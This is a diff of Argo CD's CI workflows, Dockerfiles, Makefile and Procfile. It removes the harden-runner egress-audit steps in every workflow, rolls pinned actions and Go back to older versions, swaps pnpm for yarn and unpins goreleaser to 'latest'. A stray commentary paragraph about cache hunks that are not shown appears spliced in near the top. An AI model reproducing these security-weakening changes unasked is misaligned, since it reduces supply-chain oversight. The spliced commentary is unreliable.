uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- run: |
result="${{ needs.test-e2e.result }}"
# mark as successful even if skipped
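The cache hunks in the workflow above contrast two keying schemes for the go build and module caches: a key containing `github.run_id` (unique per run, so a restore never finds an exact match) and a key containing `hashFiles('**/go.sum')` (stable until the dependency set changes). A minimal shell sketch of the content-addressed idea, using `sha256sum` as an illustrative stand-in for `hashFiles`:

```shell
#!/usr/bin/env bash
set -euo pipefail

# Hash the lockfile so the cache key changes only when dependencies do.
workdir="$(mktemp -d)"
printf 'example.com/mod v1.0.0 h1:abc=\n' > "$workdir/go.sum"

key_for() { echo "linux-go-build-v1-$(sha256sum "$1" | cut -d' ' -f1)"; }

key_a="$(key_for "$workdir/go.sum")"
key_b="$(key_for "$workdir/go.sum")"   # same contents -> same key, cache hit

printf 'example.com/other v2.0.0 h1:def=\n' >> "$workdir/go.sum"
key_c="$(key_for "$workdir/go.sum")"   # changed dependencies -> new key

echo "$key_a"
echo "$key_c"
```

The `restore-keys` prefix in the same hunk (`${{ runner.os }}-go-build-v1-`) then lets a run with a changed `go.sum` still start from the most recent partial match rather than an empty cache.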

@@ -28,10 +28,6 @@ concurrency:
permissions:
contents: read
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
CodeQL-Build:
permissions:
@@ -43,24 +39,18 @@ jobs:
# CodeQL runs on ubuntu-latest and windows-latest
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout repository
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
# Use correct go version. https://github.com/github/codeql-action/issues/1842#issuecomment-1704398087
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version-file: go.mod
# Initializes the CodeQL tools for scanning.
- name: Initialize CodeQL
uses: github/codeql-action/init@c10b8064de6f491fea524254123dbe5e09572f13 # v4.35.1
uses: github/codeql-action/init@8fcfedf57053e09257688fce7a0beeb18b1b9ae3 # v2.17.2
# Override language selection by uncommenting this and choosing your languages
# with:
# languages: go, javascript, csharp, python, cpp, java
@@ -68,7 +58,7 @@ jobs:
# Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
# If this step fails, then you should remove it and run the build manually (see below)
- name: Autobuild
uses: github/codeql-action/autobuild@c10b8064de6f491fea524254123dbe5e09572f13 # v4.35.1
uses: github/codeql-action/autobuild@8fcfedf57053e09257688fce7a0beeb18b1b9ae3 # v2.17.2
# Command-line programs to run using the OS shell.
# 📚 https://git.io/JvXDl
@@ -82,4 +72,4 @@ jobs:
# make release
- name: Perform CodeQL Analysis
uses: github/codeql-action/analyze@c10b8064de6f491fea524254123dbe5e09572f13 # v4.35.1
uses: github/codeql-action/analyze@8fcfedf57053e09257688fce7a0beeb18b1b9ae3 # v2.17.2

@@ -45,10 +45,6 @@ on:
permissions: {}
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
publish:
permissions:
@@ -59,12 +55,6 @@ jobs:
outputs:
image-digest: ${{ steps.image.outputs.digest }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
@@ -77,26 +67,16 @@ jobs:
if: ${{ github.ref_type != 'tag'}}
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ inputs.go-version }}
cache: false
- name: Install cosign
uses: sigstore/cosign-installer@cad07c2e89fa2edd6e2d7bab4c1aa38e53f76003 # v4.1.1
uses: sigstore/cosign-installer@ba7bc0a3fef59531c69a25acd34668d6d3fe6f22 # v4.1.0
- name: Setup QEMU
uses: docker/setup-qemu-action@ce360397dd3f832beb865e1373c09c0e9f86d70a # v4.0.0
with:
image: tonistiigi/binfmt@sha256:d3b963f787999e6c0219a48dba02978769286ff61a5f4d26245cb6a6e5567ea3 #qemu-v10.0.4
- name: Setup Docker Buildx
uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4.0.0
with:
# buildkit v0.28.1
driver-opts: |
image=moby/buildkit@sha256:a82d1ab899cda51aade6fe818d71e4b58c4079e047a0cf29dbb93b2b0465ea69
- uses: docker/setup-qemu-action@ce360397dd3f832beb865e1373c09c0e9f86d70a # v4.0.0
- uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4.0.0
- name: Setup tags for container image as a CSV type
run: |
@@ -123,7 +103,7 @@ jobs:
echo 'EOF' >> $GITHUB_ENV
- name: Login to Quay.io
uses: docker/login-action@4907a6ddec9925e35a0a9e82d7399ccc52663121 # v4.1.0
uses: docker/login-action@b45d80f862d83dbcd57f89517bcf500b2ab88fb2 # v4.0.0
with:
registry: quay.io
username: ${{ secrets.quay_username }}
@@ -131,7 +111,7 @@ jobs:
if: ${{ inputs.quay_image_name && inputs.push }}
- name: Login to GitHub Container Registry
uses: docker/login-action@4907a6ddec9925e35a0a9e82d7399ccc52663121 # v4.1.0
uses: docker/login-action@b45d80f862d83dbcd57f89517bcf500b2ab88fb2 # v4.0.0
with:
registry: ghcr.io
username: ${{ secrets.ghcr_username }}
@@ -139,7 +119,7 @@ jobs:
if: ${{ inputs.ghcr_image_name && inputs.push }}
- name: Login to dockerhub Container Registry
uses: docker/login-action@4907a6ddec9925e35a0a9e82d7399ccc52663121 # v4.1.0
uses: docker/login-action@b45d80f862d83dbcd57f89517bcf500b2ab88fb2 # v4.0.0
with:
username: ${{ secrets.docker_username }}
password: ${{ secrets.docker_password }}

@@ -15,10 +15,6 @@ concurrency:
permissions: {}
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
set-vars:
permissions:
@@ -35,12 +31,6 @@ jobs:
ghcr_provenance_image: ${{ steps.image.outputs.ghcr_provenance_image }}
allow_ghcr_publish: ${{ steps.image.outputs.allow_ghcr_publish }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Set image tag and names
@@ -96,7 +86,7 @@ jobs:
with:
# Note: cannot use env variables to set go-version (https://docs.github.com/en/actions/using-workflows/reusing-workflows#limitations)
# renovate: datasource=golang-version packageName=golang
go-version: 1.26.2
go-version: 1.26.0
platforms: ${{ needs.set-vars.outputs.platforms }}
push: false
@@ -113,7 +103,7 @@ jobs:
ghcr_image_name: ${{ needs.set-vars.outputs.ghcr_image_name }}
# Note: cannot use env variables to set go-version (https://docs.github.com/en/actions/using-workflows/reusing-workflows#limitations)
# renovate: datasource=golang-version packageName=golang
go-version: 1.26.2
go-version: 1.26.0
platforms: ${{ needs.set-vars.outputs.platforms }}
push: true
secrets:


@@ -14,10 +14,6 @@ on:
permissions: {}
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
prepare-release:
permissions:
@@ -32,12 +28,6 @@ jobs:
IMAGE_NAMESPACE: ${{ vars.IMAGE_NAMESPACE || 'argoproj' }}
IMAGE_REPOSITORY: ${{ vars.IMAGE_REPOSITORY || 'argocd' }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:


@@ -6,10 +6,6 @@ on:
permissions: {}
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
# PR updates can happen in quick succession leading to this
# workflow being triggered a number of times. This limits it
# to one run per PR.
@@ -25,12 +21,6 @@ jobs:
name: Validate PR Title
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- uses: thehanimo/pr-title-checker@7fbfe05602bdd86f926d3fb3bccb6f3aed43bc70 # v1.4.3
with:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}


@@ -11,10 +11,8 @@ permissions: {}
env:
# renovate: datasource=golang-version packageName=golang
GOLANG_VERSION: '1.26.2' # Note: go-version must also be set in job argocd-image.with.go-version
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
GOLANG_VERSION: '1.26.0' # Note: go-version must also be set in job argocd-image.with.go-version
jobs:
argocd-image:
needs: [setup-variables]
@@ -28,7 +26,7 @@ jobs:
quay_image_name: ${{ needs.setup-variables.outputs.quay_image_name }}
# Note: cannot use env variables to set go-version (https://docs.github.com/en/actions/using-workflows/reusing-workflows#limitations)
# renovate: datasource=golang-version packageName=golang
go-version: 1.26.2
go-version: 1.26.0
platforms: linux/amd64,linux/arm64,linux/s390x,linux/ppc64le
push: true
secrets:
@@ -49,11 +47,6 @@ jobs:
provenance_image: ${{ steps.var.outputs.provenance_image }}
allow_fork_release: ${{ steps.var.outputs.allow_fork_release }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
@@ -140,7 +133,7 @@ jobs:
run: git fetch --force --tags
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
cache: false
@@ -169,7 +162,7 @@ jobs:
uses: goreleaser/goreleaser-action@ec59f474b9834571250b370d4735c50f8e2d1e29 # v7.0.0
id: run-goreleaser
with:
version: v2.14.3
version: latest
args: release --clean --timeout 55m
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
@@ -225,13 +218,8 @@ jobs:
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- name: Install pnpm
uses: pnpm/action-setup@a7487c7e89a18df4991f7f222e4898a00d66ddda # v4.1.0
with:
package_json_file: ui/package.json
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
cache: false
@@ -244,12 +232,12 @@ jobs:
# defines the sigs.k8s.io/bom version to use.
SIGS_BOM_VERSION: v0.2.1
# comma delimited list of project relative folders to inspect for package
# managers (gomod, pnpm, npm).
# managers (gomod, yarn, npm).
PROJECT_FOLDERS: '.,./ui'
# full qualified name of the docker image to be inspected
DOCKER_IMAGE: ${{ needs.setup-variables.outputs.quay_image_name }}
run: |
pnpm install --dir ./ui --frozen-lockfile
yarn install --cwd ./ui
go install github.com/spdx/spdx-sbom-generator/cmd/generator@$SPDX_GEN_VERSION
go install sigs.k8s.io/bom/cmd/bom@$SIGS_BOM_VERSION
@@ -276,7 +264,7 @@ jobs:
echo "hashes=$(sha256sum /tmp/sbom.tar.gz | base64 -w0)" >> "$GITHUB_OUTPUT"
- name: Upload SBOM
uses: softprops/action-gh-release@153bb8e04406b158c6c84fc1615b65b24149a1fe # v2.6.1
uses: softprops/action-gh-release@a06a81a03ee405af7f2048a818ed3f03bbf83c7b # v2.5.0
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
with:


@@ -7,24 +7,14 @@ on:
permissions:
contents: read
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
renovate:
runs-on: ubuntu-24.04
if: github.repository == 'argoproj/argo-cd'
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Get token
id: get_token
uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3
uses: actions/create-github-app-token@d72941d797fd3113feb6b93fd0dec494b13a2547 # v1
with:
app-id: ${{ vars.RENOVATE_APP_ID }}
private-key: ${{ secrets.RENOVATE_APP_PRIVATE_KEY }}
@@ -32,17 +22,11 @@ jobs:
- name: Checkout
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # 6.0.2
# Renovate does not pin its docker image versions to SHA, so
# when bumping the renovate action version please check if the renovate image
# has been updated (see its numeric version in action.yaml)
# and update the `renovate-version` parameter accordingly
- name: Self-hosted Renovate
uses: renovatebot/github-action@b67590ea780158ccd13192c22a3655a5231f869d #46.1.8
uses: renovatebot/github-action@abd08c7549b2a864af5df4a2e369c43f035a6a9d #46.1.5
with:
configurationFile: .github/configs/renovate-config.js
token: '${{ steps.get_token.outputs.token }}'
renovate-image: "ghcr.io/renovatebot/renovate@sha256"
renovate-version: "5dfeab680f40edd2713b8fcae574824e60d2c831b8d89cc965e51621894c7084" #43
env:
LOG_LEVEL: 'debug'
RENOVATE_REPOSITORIES: '${{ github.repository }}'


@@ -29,12 +29,6 @@ jobs:
if: github.repository == 'argoproj/argo-cd'
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: "Checkout code"
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
@@ -68,6 +62,6 @@ jobs:
# Upload the results to GitHub's code scanning dashboard.
- name: "Upload to code-scanning"
uses: github/codeql-action/upload-sarif@c10b8064de6f491fea524254123dbe5e09572f13 # v4.35.1
uses: github/codeql-action/upload-sarif@8fcfedf57053e09257688fce7a0beeb18b1b9ae3 # v2.17.2
with:
sarif_file: results.sarif


@@ -8,20 +8,10 @@ permissions:
issues: write
pull-requests: write
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
stale:
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- uses: actions/stale@b5d41d4e1d5dceea10e7104786b73624c18a190f # v10.2.0
with:
repo-token: ${{ secrets.GITHUB_TOKEN }}


@@ -7,10 +7,6 @@ on:
permissions:
contents: read
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
snyk-report:
permissions:
@@ -20,12 +16,6 @@ jobs:
name: Update Snyk report in the docs directory
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
agent-enabled: "false"
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:


@@ -4,7 +4,7 @@ ARG BASE_IMAGE=docker.io/library/ubuntu:25.10@sha256:4a9232cc47bf99defcc8860ef62
# Initial stage which pulls and prepares build dependencies and CLI tooling we need for our final image
# Also used as the image in CI jobs so needs all dependencies
####################################################################################################
FROM docker.io/library/golang:1.26.2@sha256:2a2b4b5791cea8ae09caecba7bad0bd9631def96e5fe362e4a5e67009fe4ae61 AS builder
FROM docker.io/library/golang:1.26.0@sha256:fb612b7831d53a89cbc0aaa7855b69ad7b0caf603715860cf538df854d047b84 AS builder
WORKDIR /tmp
@@ -95,21 +95,22 @@ WORKDIR /home/argocd
FROM --platform=$BUILDPLATFORM docker.io/library/node:23.0.0@sha256:9d09fa506f5b8465c5221cbd6f980e29ae0ce9a3119e2b9bc0842e6a3f37bb59 AS argocd-ui
WORKDIR /src
COPY ["ui/package.json", "ui/pnpm-lock.yaml", "./"]
COPY ["ui/package.json", "ui/yarn.lock", "./"]
RUN npm install -g corepack@0.34.6 && corepack enable && pnpm install --frozen-lockfile
RUN yarn install --network-timeout 200000 && \
yarn cache clean
COPY ["ui/", "."]
ARG ARGO_VERSION=latest
ENV ARGO_VERSION=$ARGO_VERSION
ARG TARGETARCH
RUN HOST_ARCH=$TARGETARCH NODE_ENV='production' NODE_ONLINE_ENV='online' NODE_OPTIONS=--max_old_space_size=8192 pnpm build
RUN HOST_ARCH=$TARGETARCH NODE_ENV='production' NODE_ONLINE_ENV='online' NODE_OPTIONS=--max_old_space_size=8192 yarn build
####################################################################################################
# Argo CD Build stage which performs the actual build of Argo CD binaries
####################################################################################################
FROM --platform=$BUILDPLATFORM docker.io/library/golang:1.26.2@sha256:2a2b4b5791cea8ae09caecba7bad0bd9631def96e5fe362e4a5e67009fe4ae61 AS argocd-build
FROM --platform=$BUILDPLATFORM docker.io/library/golang:1.26.0@sha256:fb612b7831d53a89cbc0aaa7855b69ad7b0caf603715860cf538df854d047b84 AS argocd-build
WORKDIR /go/src/github.com/argoproj/argo-cd


@@ -1,4 +1,4 @@
FROM docker.io/library/golang:1.26.2@sha256:2a2b4b5791cea8ae09caecba7bad0bd9631def96e5fe362e4a5e67009fe4ae61
FROM docker.io/library/golang:1.26.0@sha256:fb612b7831d53a89cbc0aaa7855b69ad7b0caf603715860cf538df854d047b84
ENV DEBIAN_FRONTEND=noninteractive


@@ -4,6 +4,6 @@ WORKDIR /app/ui
COPY ui /app/ui
RUN npm install -g corepack@0.34.6 && corepack enable && pnpm install
RUN yarn install
ENTRYPOINT ["pnpm", "start"]
ENTRYPOINT ["yarn", "start"]


@@ -74,7 +74,7 @@ ARGOCD_E2E_APISERVER_PORT?=8080
ARGOCD_E2E_REPOSERVER_PORT?=8081
ARGOCD_E2E_REDIS_PORT?=6379
ARGOCD_E2E_DEX_PORT?=5556
ARGOCD_E2E_JS_HOST?=localhost
ARGOCD_E2E_YARN_HOST?=localhost
ARGOCD_E2E_DISABLE_AUTH?=
ARGOCD_E2E_DIR?=/tmp/argo-e2e
@@ -113,7 +113,7 @@ define run-in-test-server
-e GOCACHE=/tmp/go-build-cache \
-e ARGOCD_IN_CI=$(ARGOCD_IN_CI) \
-e ARGOCD_E2E_TEST=$(ARGOCD_E2E_TEST) \
-e ARGOCD_E2E_JS_HOST=$(ARGOCD_E2E_JS_HOST) \
-e ARGOCD_E2E_YARN_HOST=$(ARGOCD_E2E_YARN_HOST) \
-e ARGOCD_E2E_DISABLE_AUTH=$(ARGOCD_E2E_DISABLE_AUTH) \
-e ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} \
-e ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} \
@@ -419,7 +419,7 @@ lint-ui: test-tools-image
.PHONY: lint-ui-local
lint-ui-local:
cd ui && pnpm lint
cd ui && yarn lint
# Build all Go code
.PHONY: build
@@ -487,7 +487,7 @@ test-e2e:
test-e2e-local: cli-local
# NO_PROXY ensures all tests don't go out through a proxy if one is configured on the test system
export GO111MODULE=off
ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_PROGRESSIVE_SYNCS=$${ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_PROGRESSIVE_SYNCS:-true} DIST_DIR=${DIST_DIR} RERUN_FAILS=$(ARGOCD_E2E_RERUN_FAILS) PACKAGES="./test/e2e" ARGOCD_E2E_RECORD=${ARGOCD_E2E_RECORD} ARGOCD_CONFIG_DIR=$(HOME)/.config/argocd-e2e ARGOCD_GPG_ENABLED=true NO_PROXY=* ./hack/test.sh -timeout $(ARGOCD_E2E_TEST_TIMEOUT) -v -args -test.gocoverdir="$(PWD)/test-results"
DIST_DIR=${DIST_DIR} RERUN_FAILS=$(ARGOCD_E2E_RERUN_FAILS) PACKAGES="./test/e2e" ARGOCD_E2E_RECORD=${ARGOCD_E2E_RECORD} ARGOCD_CONFIG_DIR=$(HOME)/.config/argocd-e2e ARGOCD_GPG_ENABLED=true NO_PROXY=* ./hack/test.sh -timeout $(ARGOCD_E2E_TEST_TIMEOUT) -v -args -test.gocoverdir="$(PWD)/test-results"
# Spawns a shell in the test server container for debugging purposes
debug-test-server: test-tools-image
@@ -663,7 +663,7 @@ dep-ui: test-tools-image
$(call run-in-test-client,make dep-ui-local)
dep-ui-local:
cd ui && pnpm install
cd ui && yarn install
start-test-k8s:
go run ./hack/k8s


@@ -2,13 +2,13 @@ controller: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run
api-server: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/api-server} FORCE_LOG_COLORS=1 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-server $COMMAND --loglevel debug --redis localhost:${ARGOCD_E2E_REDIS_PORT:-6379} --disable-auth=${ARGOCD_E2E_DISABLE_AUTH:-'true'} --insecure --dex-server http://localhost:${ARGOCD_E2E_DEX_PORT:-5556} --repo-server localhost:${ARGOCD_E2E_REPOSERVER_PORT:-8081} --port ${ARGOCD_E2E_APISERVER_PORT:-8080} --otlp-address=${ARGOCD_OTLP_ADDRESS} --application-namespaces=${ARGOCD_APPLICATION_NAMESPACES:-''} --hydrator-enabled=${ARGOCD_HYDRATOR_ENABLED:='false'}"
dex: sh -c "ARGOCD_BINARY_NAME=argocd-dex go run github.com/argoproj/argo-cd/v3/cmd gendexcfg -o `pwd`/dist/dex.yaml && (test -f dist/dex.yaml || { echo 'Failed to generate dex configuration'; exit 1; }) && docker run --rm -p ${ARGOCD_E2E_DEX_PORT:-5556}:${ARGOCD_E2E_DEX_PORT:-5556} -v `pwd`/dist/dex.yaml:/dex.yaml ghcr.io/dexidp/dex:$(grep "image: ghcr.io/dexidp/dex:v2.45.0" manifests/base/dex/argocd-dex-server-deployment.yaml | cut -d':' -f3) dex serve /dex.yaml"
redis: hack/start-redis-with-password.sh
repo-server: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "export PATH=\$(pwd)/dist:\$PATH && [ -n \"\$ARGOCD_GIT_CONFIG\" ] && export GIT_CONFIG_GLOBAL=\$ARGOCD_GIT_CONFIG && export GIT_CONFIG_NOSYSTEM=1; GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/repo-server} FORCE_LOG_COLORS=1 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_GNUPGHOME=${ARGOCD_GNUPGHOME:-/tmp/argocd-local/gpg/keys} ARGOCD_PLUGINSOCKFILEPATH=${ARGOCD_PLUGINSOCKFILEPATH:-./test/cmp} ARGOCD_GPG_DATA_PATH=${ARGOCD_GPG_DATA_PATH:-/tmp/argocd-local/gpg/source} ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-repo-server ARGOCD_GPG_ENABLED=${ARGOCD_GPG_ENABLED:-false} $COMMAND --loglevel debug --port ${ARGOCD_E2E_REPOSERVER_PORT:-8081} --redis localhost:${ARGOCD_E2E_REDIS_PORT:-6379} --otlp-address=${ARGOCD_OTLP_ADDRESS}"
repo-server: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "export PATH=./dist:\$PATH && [ -n \"\$ARGOCD_GIT_CONFIG\" ] && export GIT_CONFIG_GLOBAL=\$ARGOCD_GIT_CONFIG && export GIT_CONFIG_NOSYSTEM=1; GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/repo-server} FORCE_LOG_COLORS=1 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_GNUPGHOME=${ARGOCD_GNUPGHOME:-/tmp/argocd-local/gpg/keys} ARGOCD_PLUGINSOCKFILEPATH=${ARGOCD_PLUGINSOCKFILEPATH:-./test/cmp} ARGOCD_GPG_DATA_PATH=${ARGOCD_GPG_DATA_PATH:-/tmp/argocd-local/gpg/source} ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-repo-server ARGOCD_GPG_ENABLED=${ARGOCD_GPG_ENABLED:-false} $COMMAND --loglevel debug --port ${ARGOCD_E2E_REPOSERVER_PORT:-8081} --redis localhost:${ARGOCD_E2E_REDIS_PORT:-6379} --otlp-address=${ARGOCD_OTLP_ADDRESS}"
cmp-server: [ "$ARGOCD_E2E_TEST" = 'true' ] && exit 0 || [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "FORCE_LOG_COLORS=1 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_BINARY_NAME=argocd-cmp-server ARGOCD_PLUGINSOCKFILEPATH=${ARGOCD_PLUGINSOCKFILEPATH:-./test/cmp} $COMMAND --config-dir-path ./test/cmp --loglevel debug --otlp-address=${ARGOCD_OTLP_ADDRESS}"
commit-server: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/commit-server} FORCE_LOG_COLORS=1 ARGOCD_BINARY_NAME=argocd-commit-server $COMMAND --loglevel debug --port ${ARGOCD_E2E_COMMITSERVER_PORT:-8086}"
ui: sh -c 'cd ui && ${ARGOCD_E2E_PNPM_CMD:-pnpm} start'
ui: sh -c 'cd ui && ${ARGOCD_E2E_YARN_CMD:-yarn} start'
git-server: test/fixture/testrepos/start-git.sh
helm-registry: test/fixture/testrepos/start-helm-registry.sh
oci-registry: test/fixture/testrepos/start-authenticated-helm-registry.sh
dev-mounter: [ "$ARGOCD_E2E_TEST" != "true" ] && go run hack/dev-mounter/main.go --configmap argocd-ssh-known-hosts-cm=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} --configmap argocd-tls-certs-cm=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} --configmap argocd-gpg-keys-cm=${ARGOCD_GPG_DATA_PATH:-/tmp/argocd-local/gpg/source}
applicationset-controller: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/applicationset-controller} FORCE_LOG_COLORS=4 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-applicationset-controller ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_PROGRESSIVE_SYNCS=${ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_PROGRESSIVE_SYNCS:-true} $COMMAND --loglevel debug --metrics-addr localhost:12345 --probe-addr localhost:12346 --argocd-repo-server localhost:${ARGOCD_E2E_REPOSERVER_PORT:-8081}"
applicationset-controller: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/applicationset-controller} FORCE_LOG_COLORS=4 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-applicationset-controller $COMMAND --loglevel debug --metrics-addr localhost:12345 --probe-addr localhost:12346 --argocd-repo-server localhost:${ARGOCD_E2E_REPOSERVER_PORT:-8081}"
